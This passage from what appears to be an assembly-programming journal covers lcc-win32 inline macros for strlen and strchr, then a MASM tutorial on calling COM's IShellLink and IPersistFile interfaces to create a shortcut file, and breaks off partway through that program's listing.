      }
/*
Here we generate the code for the strlen routine. Note that the % sign is
used by the assembler of lcc-win32 to mark a register keyword, but our
print() function uses it too to mark (as printf does) the beginning of an
argument. We must double them to get around this collision.

1) Set the counter to minus one
*/
      print("\torl\t$-1,%%eax\n");
/*
2) We should generate the label for this instance. All labels must be
unique, and the easiest way to ensure that we always generate a new label is
to number them consecutively using a counter. To avoid colliding with other
labels, we use a unique prefix too.
*/
      print("_$strlen%d:\n",labelCount);
/*
3) Now we generate the code for the body of the loop searching for the
character zero.
*/
      print("\tinc\t%%eax\n");
/* 4) Note the dollar before the immediate constant.*/
      print("\tcmpb\t$0,(%%ecx,%%eax)\n");
/*
5) We generate the jump, incrementing our label counter afterwards
*/
      print("\tjnz\t_$strlen%d\n",labelCount++);

/*
Now we are done; the result is in eax, as it should be. We finish our
function. Note that no pops are needed, since the ones we (possibly) did at
the beginning are just to compensate for the pushes the compiler generated.
Note too that we shouldn't emit a return instruction, since this is a macro
that shouldn't cause the current function to return!
*/
}

We compile the compiler, and we obtain a new compiler that will recognize the
macro we have just created. Compiling the compiler with itself is a good test
for your new function, of course. This should be done at least three times
to be sure that your function is working OK.

Register assignments
--------------------
In general, you can use ECX, EDX, and EAX as you wish. The contents of EBX,
ESI, EBP and EDI should always be saved. If you destroy them, unpredictable
results will surely occur.

Let's write a test function for our new compiler:

#include <stdio.h>
#ifdef MACRO
int _stdcall _strlen(char *);
#define strlen _strlen
#else
int strlen(char *);
#endif
int main(int argc, char *argv[])
{
         if (argc > 1)
                 printf("Length of \"%s\" is %d\n", argv[1],
                         strlen(argv[1]));
         return 0;
}

In the C source, we use the conditional MACRO to signify whether we should
use our macro, or just generate a call to the normal strlen procedure for
comparison purposes. We compile this with our new compiler, and add the -S
option to see what it is generating.

lcc -S -DMACRO tstrlen.c

The assembly (that the compiler writes in tstrlen.asm) is then:

_main:
         pushl   %ebp
         movl    %esp,%ebp
         pushl   %edi
         .line   9
         .line   10
         cmpl    $1,8(%ebp)
         jle     _$2
         .line   11
         movl    12(%ebp),%edi
; Our argument gets assigned to ECX, as our strlenArgs function
; defined
         movl    4(%edi),%ecx
; Here is the begin of our macro body
         orl     $-1,%eax
; This is our generated label
_$strlen0:
         inc     %eax
         cmpb    $0,(%ecx,%eax)
         jnz     _$strlen0
; Our macro ends here, leaving its results in EAX
         pushl   %eax
         movl    12(%ebp),%edi
         pushl   4(%edi)
         pushl   $_$4
         call    _printf
         addl    $12,%esp
_$2:
         .line   12
         xor     %eax,%eax
         .line   13
         popl    %edi
         popl    %ebp
         ret

We see that there is absolutely no call overhead. The arguments are assigned
to the right registers in our function strlenArgs, and the body is expanded
in-line by strlenGen.

Next, we link our executable:

D:\lcc\src74\test>lcclnk tstrlen.obj

And we run a test:

D:\lcc\src74\test>tstrlen abcde
Length of "abcde" is 5
D:\lcc\src74\test>

Here is the strlenGen() function again for clarity.

static void strlenGen(Node p)
{
      static int labelCount;

      if (p->x.nestedCall) {
           print("\tpopl\t%%ecx\n");
      }
      print("\torl\t$-1,%%eax\n");
      print("_$strlen%d:\n",labelCount);
      print("\tinc\t%%eax\n");
      print("\tcmpb\t$0,(%%ecx,%%eax)\n");
      print("\tjnz\t_$strlen%d\n",labelCount++);
}
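
If you want to try out the label numbering and the doubled % signs without
rebuilding the compiler, a stand-alone sketch like the one below may help. It
replaces the compiler's print() with the standard snprintf() writing into a
buffer, and it takes the counter as a parameter instead of using a static
variable; both changes, and the name emit_strlen_body, are my own choices.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Writes one expansion of the strlen body into out and advances the
 * label counter. Returns the value of snprintf (characters needed). */
int emit_strlen_body(char *out, size_t size, int *label_counter)
{
    int id;

    assert(out != NULL && label_counter != NULL);
    id = (*label_counter)++;            /* each expansion gets its own label */
    return snprintf(out, size,
        "\torl\t$-1,%%eax\n"            /* %% comes out as a single %        */
        "_$strlen%d:\n"
        "\tinc\t%%eax\n"
        "\tcmpb\t$0,(%%ecx,%%eax)\n"
        "\tjnz\t_$strlen%d\n",
        id, id);
}
```

Two successive calls produce the labels _$strlen0 and _$strlen1, so two
expansions in the same assembly file cannot collide.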

Another example: inlining the strchr function
---------------------------------------------
To demonstrate a function with two arguments, we inline the strchr function.
This function should return a pointer to the first occurrence of the given
character in a string, or NULL, if the character doesnt appear in the
string.
The implementation could be like this :

_strchr:
      movb (%eax),%dl     ; read a character
      cmpb %cl,%dl        ; compare it to the searched-for char
      je   _strchrexit    ; exit if found, with pointer to char as result
      incl %eax           ; move pointer to next char
      orb  %dl,%dl        ; test for end of string
      jne  _strchr        ; if not zero continue loop
      xorl %eax,%eax      ; not found: zero result
_strchrexit:

We just scan the characters looking for either zero (end of the string) or
the given char. The pointer to the string will be in EAX, and the character
to be searched for will be in ECX. We use EDX as a scratch register.
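
As with strlen, the loop can be modelled in C to check its behaviour at the
edges, for example when the character searched for is the terminating zero
itself. The function name is hypothetical; the comments map each statement to
the instruction it stands for.

```c
#include <assert.h>
#include <stddef.h>

char *inline_strchr_model(char *s, int c)
{
    char ch;

    assert(s != NULL);
    for (;;) {
        ch = *s;                    /* movb (%eax),%dl                  */
        if (ch == (char)c)          /* cmpb %cl,%dl ; je exit           */
            return s;               /* found: pointer stays in EAX      */
        s++;                        /* incl %eax                        */
        if (ch == '\0')             /* orb %dl,%dl ; jne loop           */
            return NULL;            /* xorl %eax,%eax                   */
    }
}
```

Because the comparison comes before the end-of-string test, searching for
'\0' returns a pointer to the terminator, as the C library strchr does.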

The next step, then, is to write the strchrArgs function for assigning the
arguments. Here it is:

static Symbol strchrArgs(Node p)
{
      Symbol r=NULL;

      switch (ArgumentsIndex) {
      case 0: // First argument (from right to left) char to be searched.
                 // We put it in ECX
           if (p->x.nestedCall == 0) {
                r = SetRegister(p,intreg[ECX]);
           }
           break;
      case 1: // Second argument: pointer to the string. We put it in EAX
           if (p->x.nestedCall == 0) {
                r = SetRegister(p,intreg[EAX]);
           }
           break;
      }
      ArgumentsIndex++;
      if (p->x.nestedCall == 0)
           p->syms[2] = r;
      if (ArgumentsIndex == 2)
           ArgumentsIndex = 0;
      return r;
}

The next step is finally to write the generating function. Here it is; note
that we need two labels:

static void strchrGen(Node p)
{
      static int labelCount;

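      if (p->x.nestedCall) {
           // Both arguments are on the stack. The string pointer was
           // pushed last, so it is popped first.
           print("\tpopl\t%%eax\n");
           print("\tpopl\t%%ecx\n");
      }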
      print("_$strchr%d:\n",labelCount);
      print("\tmovb\t(%%eax),%%dl\n");
      print("\tcmpb\t%%cl,%%dl\n");
      print("\tje\t_$strchr%d\n",labelCount+1);
      print("\tinc\t%%eax\n");
      print("\torb\t%%dl,%%dl\n");
      print("\tjne\t_$strchr%d\n",labelCount);
      print("\txorl\t%%eax,%%eax\n");
      print("_$strchr%d:\n",labelCount+1);
      labelCount += 2;
}


This facility is not very common in a compiler system, and it allows you to
use assembly language in the routines where it is *really* needed in a
software system, leaving to the compiler the tedious work of generating the
assembly for you in the 90% of the code where speed is not so important after
all.

Another benefit is that you can't make simple mistakes when passing arguments
to your assembler macros, since they are understood as function calls by the
compiler, and all prototype checking is done by the front end. If you attempt
to use the strchr macro like this:
      strchr('\n',string);
the compiler will issue an error.


The lcc-win32 system can be downloaded free of charge from
     http://ps.qss.cz/lcc



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                            Accessing COM Objects from Assembly
                                            by Ernest Murphy


Abstract
--------
COM (the Component Object Model) is used by the Windows operating system in
an increasing number of ways. For example, shell32.dll uses COM to access
some of its API methods. The IShellLink and IPersistFile interfaces of
shell32.dll will be used to demonstrate how to create a shortcut (shell
link). A basic understanding of COM is assumed. The code sample included is
MASM specific.


Introduction
------------
   COM may seem complicated with its numerous details, but in use these
complications disappear into simple function calls. The hardest part is
understanding the data structures involved so you can define the interfaces.

   I apologize for all the C++ terminology used in here. While COM is
implementation neutral, it borrows much terminology from C++ to define
itself.

   In order to use the COM methods of some object, you must first instantiate
(create) that object from its coclass, then ask it to return you a pointer to
its interface. This process is performed by the API function
CoCreateInstance. When you are done with the interface you call its Release
method, and COM and the coclass will take care of unloading the coclass.

Accessing COM Methods
---------------------
   To use COM methods you need to know beforehand what the interface looks
like. Even if you "late bind" through an IDispatch interface, you still need
to know what IDispatch looks like.

   A COM interface is just a table of pointers to functions. Let's start with
the IUnknown interface. If you were to create a component that simply exports
the IUnknown interface, you would have a fully functional COM object (albeit
on the level of "Hello World"). IUnknown has the 3 basic methods of every
interface, since all interfaces inherit from IUnknown. Keep in mind that all
an interface consists of is a structure of function pointers. For IUnknown,
it looks like this:

IUnknown                STRUCT DWORD
     ; IUnknown methods
     QueryInterface                  IUnknown_QueryInterface         ?
     AddRef                          IUnknown_AddRef                 ?
     Release                         IUnknown_Release                ?
IUnknown                ENDS

   That's it, just 12 bytes long. It holds 3 DWORD pointers to the procedures
that actually implement the methods. It is the infamous "vtable" you may have
heard of. The pointers are defined as such so we can have MASM do some type
checking for us when compiling our calls.

   Since the vtable holds the addresses of functions, or pointers, these
pointers are typedefed in our interface definition as such:

IUnknown_QueryInterface         typedef ptr IUnknown_QueryInterfaceProto
IUnknown_AddRef                 typedef ptr IUnknown_AddRefProto
IUnknown_Release                typedef ptr IUnknown_ReleaseProto

   Finally, we define the function prototypes as follows:

IUnknown_QueryInterfaceProto            typedef PROTO :DWORD, :DWORD, :DWORD
IUnknown_AddRefProto                    typedef PROTO :DWORD
IUnknown_ReleaseProto                   typedef PROTO :DWORD

   In keeping with the MASM32 practice of "loose" type checking, function
parameters are just defined as DWORDs. It is a lot of work to set things up,
but it does keep lots of errors confined to compile time, not run time. In
practice, you can wrap up your interface definitions in include files and
keep them from cluttering up your source code.

   One rather big complication in defining an interface: MASM cannot resolve
forward references like this, so we have to define them backwards, by
defining the function prototype typedefs first, and the interface table last.
The sample program later on defines the interfaces this way.

   To actually use an interface, you need a pointer to it. The
CoCreateInstance API can be used to return us this indirect pointer to an
interface structure. It is one level removed from the vtable itself, and
actually points to the "object" that holds the interface. (This would be
clearer had I been creating the interface instead of using one. Please wait
for a future article for that.) The place this pointer points to in the
object points to the interface structure. Thus, this pointer is generically
named "ppv", for "pointer to pointer to (void)," where (void) means an
unspecified type.

   For example, say we used CoCreateInstance and successfully got an
interface pointer ppv, and wanted to see if it supports some other interface.
We can call its QueryInterface method and request a new ppv to the other
interface we are interested in. Such a call would look like this:

mov eax, ppv            ; get pointer to the object
mov edx, [eax]          ; and use it to find the interface structure
                        ; and then call that method
invoke (IUnknown PTR [edx]).QueryInterface, ppv,
                         ADDR IID_SomeOtherInterface, ADDR ppv_new

   I hope you find this as wonderfully simple as I do. IID_SomeOtherInterface
holds the GUID of the interface we desire, and ppv_new is a new pointer we
can use to access it. Also note we must pass in the pointer we used; this
lets the interface know which object (literally "this" object) we are using.
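
   The double indirection is perhaps easiest to see in a toy model written in
C. Nothing here is real COM: the types, the integer interface ids and the
return codes are stand-ins invented for this sketch, and there is no
CoCreateInstance. It only shows an object whose first field points to a
table of function pointers, and a call that passes the object itself as the
first argument.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define TOY_S_OK            0
#define TOY_E_NOINTERFACE   (-2147467262)   /* 0x80004002 as a signed value */
#define TOY_IID_UNKNOWN     0               /* stand-in for a GUID          */

typedef struct ToyObject ToyObject;

typedef struct {                            /* the "vtable": 3 pointers     */
    int32_t  (*QueryInterface)(ToyObject *self, int iid, void **out);
    uint32_t (*AddRef)(ToyObject *self);
    uint32_t (*Release)(ToyObject *self);
} ToyVtbl;

struct ToyObject {
    const ToyVtbl *vtbl;    /* first field: what "mov edx, [eax]" fetches   */
    uint32_t       refs;
};

static uint32_t toy_addref(ToyObject *self)  { return ++self->refs; }
static uint32_t toy_release(ToyObject *self) { return --self->refs; }

static int32_t toy_query(ToyObject *self, int iid, void **out)
{
    assert(self != NULL && out != NULL);
    if (iid != TOY_IID_UNKNOWN) {
        *out = NULL;
        return TOY_E_NOINTERFACE;
    }
    *out = self;
    toy_addref(self);
    return TOY_S_OK;
}

static const ToyVtbl toy_vtbl = { toy_query, toy_addref, toy_release };

void toy_init(ToyObject *obj)
{
    obj->vtbl = &toy_vtbl;
    obj->refs = 1;
}
```

   A call then reads ppv->vtbl->QueryInterface(ppv, TOY_IID_UNKNOWN, &out):
ppv is used once to find the table and once more as the THIS argument, just
as in the invoke above.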

   Incidentally, in a previous APJ article on COM, there was an error in how
a COM interface is invoked. THIS was left out of the COM call. The program
seemed to work, because the COM invoke was made from the main code, not from
a procedure, and did not require a return before calling ExitProcess. Had
this COM invoke been done from a procedure, a stack error crash would have
resulted.

   Note the register must be type cast (IUnknown PTR [edx]). This lets the
compiler know what structure to use to get the correct offset in the vtable
for the .QueryInterface function (in this case it means an offset of zero
from edx). Actually, the information contained in the interface name and
function name disappears at compile time; all that is left is a numeric
offset from an as yet unspecified pointer value.

   We can simplify a COM invoke further with a macro:

     coinvoke MACRO pInterface:REQ, Interface:REQ, Function:REQ, args:VARARG
         LOCAL istatement, arg
         ;; invokes an arbitrary COM interface
         ;; pInterface    pointer to a specific interface instance
         ;; Interface     the Interface's struct typedef
         ;; Function      which function or method of the interface to perform
         ;; args          all required arguments
         ;;               (type, kind and count determined by the function)
         istatement TEXTEQU <invoke (Interface PTR[eax]).&Function, pInterface>
         FOR arg, <args>
             ; build the list of parameter arguments
             istatement CATSTR istatement, <, >, <&arg>
         ENDM
         mov eax, pInterface
         mov eax, [eax]
         istatement
     ENDM

Thus, the same QueryInterface method as before can be invoked in a single
statement:

     coinvoke ppv, IUnknown, QueryInterface,
                         ADDR IID_SomeOtherInterface, ADDR ppv_new

   The return value of every COM call is an hResult, a 4-byte value returned
in eax. It is used to signal success or failure. Since the most significant
bit is used to indicate failure, you can test the result with a simple:

     test eax, eax       ; set the flags from the hResult in eax
     .IF !SIGN?
         ; function passed
     .ELSE
         ; function failed
     .ENDIF

   Again, this can be simplified with some more simple macros:

     SUCCEEDED    TEXTEQU     <!!SIGN?>
     FAILED      TEXTEQU     <!!SUCCEEDED>

   (The not ! sign must be doubled since that symbol has special meaning in
MASM macros)
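
   The sign test itself is easy to state in C. The sketch below assumes the
hResult is held in a signed 32-bit integer; the names are made up, and the
two constants are the numeric values of S_OK and E_NOINTERFACE written out by
hand so that the example does not depend on any Windows header.

```c
#include <assert.h>
#include <stdint.h>

#define TOY_S_OK            0
#define TOY_S_FALSE         1
#define TOY_E_NOINTERFACE   (-2147467262)   /* 0x80004002 as a signed value */

/* Success means the most significant (sign) bit is clear. */
int hr_succeeded(int32_t hr) { return hr >= 0; }
int hr_failed(int32_t hr)    { return hr < 0; }

/* Small self-check showing the intended use. */
void hr_demo(void)
{
    assert(hr_succeeded(TOY_S_OK));
    assert(hr_succeeded(TOY_S_FALSE));      /* non-zero, yet still success */
    assert(hr_failed(TOY_E_NOINTERFACE));
}
```

   Note that a non-zero value such as S_FALSE still counts as success, which
is why the test looks at the sign and not at zero.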

   That's about all you need to fully invoke and use interfaces from COM
objects from assembly. These techniques work with any COM or ActiveX object.


Back to the Real World: Using IShellLink and IPersistFile from shell32.dll
--------------------------------------------------------------------------
The shell32.dll provides a simple, easy way to make shell links (shortcuts).
However, it uses a COM interface to provide this service. The sample below is
based on the MSDN "Shell Links" section for "Internet Tools and
Technologies." This may be a strange place to find documentation, but there
it is.

The "Shell Links" article may be found at
http://msdn.microsoft.com/library/psdk/shellcc/shell/Shortcut.htm

For this tutorial we will access the following members of the IShellLink and
the IPersistFile interfaces. Note every interface includes a "ppi" interface
parameter; this is the interface that we are calling (it is the THIS
parameter). (The following interface information is a copy of information
published by Microsoft.)


IShellLink::QueryInterface, ppi, ADDR riid, ADDR ppv
* riid: The identifier of the interface requested. To get access to the
* ppv: The pointer to the variable that receives the interface.
Description: Checks if the object also supports the requested interface. If
so, assigns the ppv pointer with the interface's pointer.

IShellLink::Release, ppi
Description: Decrements the reference count on the IShellLink interface.

IShellLink::SetPath, ppi, ADDR szFile
* pszFile: A pointer to a text buffer containing the new path for the shell
link object.
Description: Defines the file the shell link points to.

IShellLink::SetIconLocation, ppi, ADDR szIconPath, iIcon
* pszIconPath: A pointer to a text buffer containing the new icon path.
* iIcon: An index to the icon. This index is zero based.
Description: Sets which icon the shell link will use.

IPersistFile::Save, ppi, ADDR szFileName, fRemember
* pszFileName: Points to a zero-terminated string containing the absolute
path of the file to which the object should be saved.
* fRemember: Indicates whether the pszFileName parameter is to be used as the
current working file. If TRUE, pszFileName becomes the current file and the
object should clear its dirty flag after the save. If FALSE, this save
operation is a "Save A Copy As ..." operation. In this case, the current file
is unchanged and the object should not clear its dirty flag. If pszFileName
is NULL, the implementation should ignore the fRemember flag.
Description: Performs a save operation for the ShellLink object, i.e. saves
the shell link we are creating.

IPersistFile::Release, ppi
Description: Decrements the reference count on the IPersistFile interface.

   These interfaces contain many more methods (see the full interface
definitions in the code below), but we only need to concentrate on those we
will actually be using.

   A shell link is the MS-speak name for a shortcut icon. The information
contained in a link (.lnk) file is:

      1 - The file path and name of the program to shell.

      2 - Where to obtain the icon to display for the shortcut (usually from
          the executable itself), and which icon in that file to use. We will
          use the first icon in the file.

      3 - A file path and name where the shortcut should be stored.

   The use of these interfaces is simple and straightforward. It goes like
this:

      * Call CoCreateInstance with CLSID_ShellLink for an IID_IShellLink
        interface
      * Call IShellLink.QueryInterface for an IID_IPersistFile interface
      * Call IShellLink.SetPath to specify where the shortcut target is
      * Call IShellLink.SetIconLocation to specify which icon to use
      * Call IPersistFile.Save to save our new shortcut .lnk file.
      * Call IPersistFile.Release
      * Call IShellLink.Release

   The last two steps release our hold on these interfaces, which in turn
allows the dll that supplied them to be unloaded.
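
   For anyone who has not met COM reference counting before, the effect of
the QueryInterface and Release steps can be modelled in a few lines of
portable C. This is only a sketch under my own assumptions: the struct and
function names are invented for illustration and appear in no Microsoft
header, and a real object keeps its count inside the server dll.

```c
#include <assert.h>

/* Hypothetical stand-in for a COM object: one count shared by every
   interface pointer handed out for it. Not a real COM type. */
struct counted_object {
    int refs;       /* outstanding interface pointers */
    int destroyed;  /* set once the last pointer is released */
};

/* Models CoCreateInstance: the caller receives the first reference. */
void object_create(struct counted_object *obj)
{
    obj->refs = 1;
    obj->destroyed = 0;
}

/* Models a successful QueryInterface: a second pointer, one more
   reference. Returns the new count. */
int object_query(struct counted_object *obj)
{
    assert(!obj->destroyed);
    return ++obj->refs;
}

/* Models Release: drops one reference and destroys the object when the
   count reaches zero. Returns the remaining count. */
int object_release(struct counted_object *obj)
{
    assert(obj->refs > 0);
    if (--obj->refs == 0)
        obj->destroyed = 1;
    return obj->refs;
}
```

   Walking the step list through this model: creation gives a count of 1,
the QueryInterface step raises it to 2, and the two Release calls bring it
back to 0, at which point the object goes away.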

   Again, the hard part in this application was finding documentation. What
finally broke the search open was using Visual Studio "Search in Files" to
find "IShellLink" and "IPersistFile" in the /include area of MSVC. This led
me to various .h files, from which I hand translated the interfaces from C
to MASM.

   Another handy tool I could have used is the command line app
"FindGUID.exe", which looks through the registry for a specific interface
name or coclass, or will output a list of every class and interface with
their associated GUIDs. Finally, the OLEView.exe application will let you
browse the registry type libraries and mine them for information. However,
these tools come with MSVC and are proprietary.

   Take care when defining an interface. Missing vtable methods lead to
strange results. Essentially COM calls, on one level, amount to "perform
function (number)" calls. Leave a method out of the vtable definition and
every later method moves up one slot, so you call the wrong function. The
original IShellLink interface definition I used, from an .inc file I
downloaded, had a missing function. The calls I made generated a "SUCCEEDED"
hResult, but in some cases would not properly clean the stack (since my push
count did not match the invoked function's pop count), thus leading to a GPF
as I exited a procedure. Keep this in mind if you ever get similar "weird"
results.

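   The slot-shifting problem is easy to reproduce outside COM. The sketch
below is plain C with made-up names (none of them come from the Windows
headers): a "server" exports a table of three functions, and two client-side
struct layouts describe that table, one complete and one with the middle
entry left out. The slot number is computed from the struct layout, just as
MASM computes a method's offset from the STRUCT definition.

```c
#include <assert.h>
#include <stddef.h>

typedef int (*method_fn)(void *self);

/* Three hypothetical methods; each returns its position in the table,
   counting from 1, so we can see which one really ran. */
static int first_method(void *self)  { (void)self; return 1; }
static int second_method(void *self) { (void)self; return 2; }
static int third_method(void *self)  { (void)self; return 3; }

/* The table the server really exports, in this order. */
#define SLOT_COUNT 3
static const method_fn server_vtable[SLOT_COUNT] = {
    first_method, second_method, third_method
};

/* Correct client-side description of the table. */
struct good_layout { method_fn First, Second, Third; };

/* Faulty description: Second was left out, so Third slides up a slot. */
struct bad_layout  { method_fn First, Third; };

/* Slot index implied by a layout, derived from the member's offset. */
#define SLOT_OF(layout, member) \
    (offsetof(struct layout, member) / sizeof(method_fn))

/* "Perform function (number)": call whatever sits in the given slot. */
int call_slot(size_t slot)
{
    assert(slot < SLOT_COUNT);
    return server_vtable[slot](NULL);
}
```

   With the complete layout, SLOT_OF(good_layout, Third) selects the third
function. With the faulty one, SLOT_OF(bad_layout, Third) selects the second
function instead, and nothing at assembly time warns you about it.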

MakeLink.asm, a demonstration of COM
------------------------------------
   This program does very little, as all good tutorial programs should. When
run, it creates a shortcut to itself, in the same directory. It can be
amusing to run from file explorer and watch the shortcut appear. Then you
can try the shortcut and watch its creation time change.

   The shell link tutorial code follows. It begins with some "hack code" to
get the full file name path of the executable, and also makes a string with
the same path in which the file name is changed to
"Shortcut to MakeLink.lnk". These strings are passed to the shell link
interface, and it is saved (or persisted in COM-speak).
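
   The string handling in that "hack code" amounts to: keep everything up to
and including the last backslash, then append the link name. A portable C
sketch of the same idea follows. The function name and the size check are my
own additions for illustration; the assembly version works in place on a
MAX_PATH buffer instead.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Builds "<directory of exe_path>\<link_name>" in out.
   Returns 0 on success, -1 if the result would not fit in out_size bytes.
   If exe_path has no backslash, the result is just link_name. */
int build_link_path(const char *exe_path, const char *link_name,
                    char *out, size_t out_size)
{
    const char *slash = strrchr(exe_path, '\\');
    /* Length of the directory part, including the trailing backslash. */
    size_t dir_len = slash ? (size_t)(slash - exe_path) + 1 : 0;
    size_t name_len = strlen(link_name);

    assert(out != NULL);
    if (dir_len + name_len + 1 > out_size)
        return -1;

    memcpy(out, exe_path, dir_len);
    memcpy(out + dir_len, link_name, name_len + 1);  /* copies the 0 too */
    return 0;
}
```

   For example, given "C:\masm32\MakeLink.exe" and the link name
"Shortcut to MakeLink.lnk", the output buffer ends up holding
"C:\masm32\Shortcut to MakeLink.lnk".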

   The CoCreateLink procedure, which actually calls the COM methods that
create the link, has been kept as general as possible, and may have reuse
possibilities in other applications.


;---------------------------------------------------------------------
; MakeLink.asm ActiveX simple client to demonstrate basic concepts
;               written & (c) copyright April 5, 2000 by Ernest Murphy
;
;               contact the author at ernie@...
;
;               may be reused for any educational or
;               non-commercial application without further license
;---------------------------------------------------------------------
.386
.model flat, stdcall
option casemap:none


include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\ole32.inc

includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\ole32.lib

;---------------------------------------------------------------------
CoCreateLink      PROTO :DWORD, :DWORD

;---------------------------------------------------------------------
; Interface definitions

; IUnknown Interface
IUnknown_QueryInterfaceProto            typedef PROTO :DWORD, :DWORD, :DWORD
IUnknown_AddRefProto                    typedef PROTO :DWORD
IUnknown_ReleaseProto                   typedef PROTO :DWORD

IUnknown_QueryInterface                 typedef ptr IUnknown_QueryInterfaceProto
IUnknown_AddRef                         typedef ptr IUnknown_AddRefProto
IUnknown_Release                        typedef ptr IUnknown_ReleaseProto

IUnknown                STRUCT DWORD
     ; IUnknown methods
     QueryInterface                      IUnknown_QueryInterface         ?
     AddRef                              IUnknown_AddRef                 ?
     Release                             IUnknown_Release                ?
IUnknown                ENDS


; IShellLink Interface
IShellLink_IShellLink_GetPathProto  typedef PROTO :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
IShellLink_GetIDListProto              typedef PROTO :DWORD, :DWORD
IShellLink_SetIDListProto              typedef PROTO :DWORD, :DWORD
IShellLink_GetDescriptionProto      typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetDescriptionProto      typedef PROTO :DWORD, :DWORD
IShellLink_GetWorkingDirectoryProto     typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetWorkingDirectoryProto     typedef PROTO :DWORD, :DWORD
IShellLink_GetArgumentsProto       typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetArgumentsProto       typedef PROTO :DWORD, :DWORD
IShellLink_GetHotkeyProto           typedef PROTO :DWORD, :DWORD
IShellLink_SetHotkeyProto           typedef PROTO :DWORD, :WORD
IShellLink_GetShowCmdProto          typedef PROTO :DWORD, :DWORD
IShellLink_SetShowCmdProto          typedef PROTO :DWORD, :DWORD
IShellLink_GetIconLocationProto     typedef PROTO :DWORD, :DWORD, :DWORD, :DWORD
IShellLink_SetIconLocationProto     typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetRelativePathProto     typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_ResolveProto             typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetPathProto             typedef PROTO :DWORD, :DWORD

IShellLink_GetPath              typedef ptr IShellLink_IShellLink_GetPathProto
IShellLink_GetIDList            typedef ptr IShellLink_GetIDListProto
IShellLink_SetIDList            typedef ptr IShellLink_SetIDListProto
IShellLink_GetDescription       typedef ptr IShellLink_GetDescriptionProto
IShellLink_SetDescription       typedef ptr IShellLink_SetDescriptionProto
IShellLink_GetWorkingDirectory  typedef ptr IShellLink_GetWorkingDirectoryProto
IShellLink_SetWorkingDirectory  typedef ptr IShellLink_SetWorkingDirectoryProto
IShellLink_GetArguments         typedef ptr IShellLink_GetArgumentsProto
IShellLink_SetArguments         typedef ptr IShellLink_SetArgumentsProto
IShellLink_GetHotkey            typedef ptr IShellLink_GetHotkeyProto
IShellLink_SetHotkey            typedef ptr IShellLink_SetHotkeyProto
IShellLink_GetShowCmd           typedef ptr IShellLink_GetShowCmdProto
IShellLink_SetShowCmd           typedef ptr IShellLink_SetShowCmdProto
IShellLink_GetIconLocation      typedef ptr IShellLink_GetIconLocationProto
IShellLink_SetIconLocation      typedef ptr IShellLink_SetIconLocationProto
IShellLink_SetRelativePath      typedef ptr IShellLink_SetRelativePathProto
IShellLink_Resolve              typedef ptr IShellLink_ResolveProto
IShellLink_SetPath              typedef ptr IShellLink_SetPathProto

IShellLink              STRUCT DWORD
     QueryInterface                      IUnknown_QueryInterface         ?
     AddRef                              IUnknown_AddRef                 ?
     Release                             IUnknown_Release                ?
     GetPath                             IShellLink_GetPath              ?
     GetIDList                           IShellLink_GetIDList            ?
     SetIDList                           IShellLink_SetIDList            ?
     GetDescription                      IShellLink_GetDescription       ?
     SetDescription                      IShellLink_SetDescription       ?
     GetWorkingDirectory                 IShellLink_GetWorkingDirectory  ?
     SetWorkingDirectory                 IShellLink_SetWorkingDirectory  ?
     GetArguments                        IShellLink_GetArguments         ?
     SetArguments                        IShellLink_SetArguments         ?
     GetHotkey                           IShellLink_GetHotkey            ?
     SetHotkey                           IShellLink_SetHotkey            ?
     GetShowCmd                          IShellLink_GetShowCmd           ?
     SetShowCmd                          IShellLink_SetShowCmd           ?
     GetIconLocation                     IShellLink_GetIconLocation      ?
     SetIconLocation                     IShellLink_SetIconLocation      ?
     SetRelativePath                     IShellLink_SetRelativePath      ?
     Resolve                             IShellLink_Resolve              ?
     SetPath                             IShellLink_SetPath              ?
IShellLink              ENDS

; IPersistFile Interface
IPersistFile_GetClassIDProto        typedef PROTO :DWORD, :DWORD
IPersistFile_IsDirtyProto           typedef PROTO :DWORD
IPersistFile_LoadProto              typedef PROTO :DWORD, :DWORD, :DWORD
IPersistFile_SaveProto              typedef PROTO :DWORD, :DWORD, :DWORD
IPersistFile_SaveCompletedProto     typedef PROTO :DWORD, :DWORD
IPersistFile_GetCurFileProto        typedef PROTO :DWORD, :DWORD
IPersistFile_GetClassID             typedef ptr IPersistFile_GetClassIDProto
IPersistFile_IsDirty                typedef ptr IPersistFile_IsDirtyProto
IPersistFile_Load                   typedef ptr IPersistFile_LoadProto
IPersistFile_Save                   typedef ptr IPersistFile_SaveProto
IPersistFile_SaveCompleted          typedef ptr IPersistFile_SaveCompletedProto
IPersistFile_GetCurFile             typedef ptr IPersistFile_GetCurFileProto

IPersistFile            STRUCT DWORD
      QueryInterface                  IUnknown_QueryInterface         ?
      AddRef                          IUnknown_AddRef                  ?
      Release                         IUnknown_Release            ?
      GetClassID                      IPersistFile_GetClassID         ?
      IsDirty                         IPersistFile_IsDirty            ?
      Load                            IPersistFile_Load               ?
      Save                            IPersistFile_Save               ?
      SaveCompleted                   IPersistFile_SaveCompleted      ?
      GetCurFile                      IPersistFile_GetCurFile         ?
IPersistFile            ENDS

;---------------------------------------------------------------------
coinvoke MACRO pInterface:REQ, Interface:REQ, Function:REQ, args:VARARG
     LOCAL istatement, arg
     ;; invokes an arbitrary COM interface
     ;; pInterface    pointer to a specific interface instance
     ;; Interface     the Interface's struct typedef
     ;; Function      which function or method of the interface to perform
     ;; args          all required arguments
     ;;                   (type, kind and count determined by the function)
     istatement TEXTEQU <invoke (Interface PTR[eax]).&Function, pInterface>
     FOR arg, <args>
         ; build the list of parameter arguments
         istatement CATSTR istatement, <, >, <&arg>
     ENDM
     mov eax, pInterface
     mov eax, [eax]
     istatement
ENDM

; equate primitives
SUCEEDED    TEXTEQU     <!!SIGN?>
FAILED      TEXTEQU     <!!SUCEEDED>

MakeMessage MACRO Text:REQ
     ; macro to display a message box
     ; the text to display is kept local to
     ; this routine for ease of use
     LOCAL lbl
     LOCAL sztext
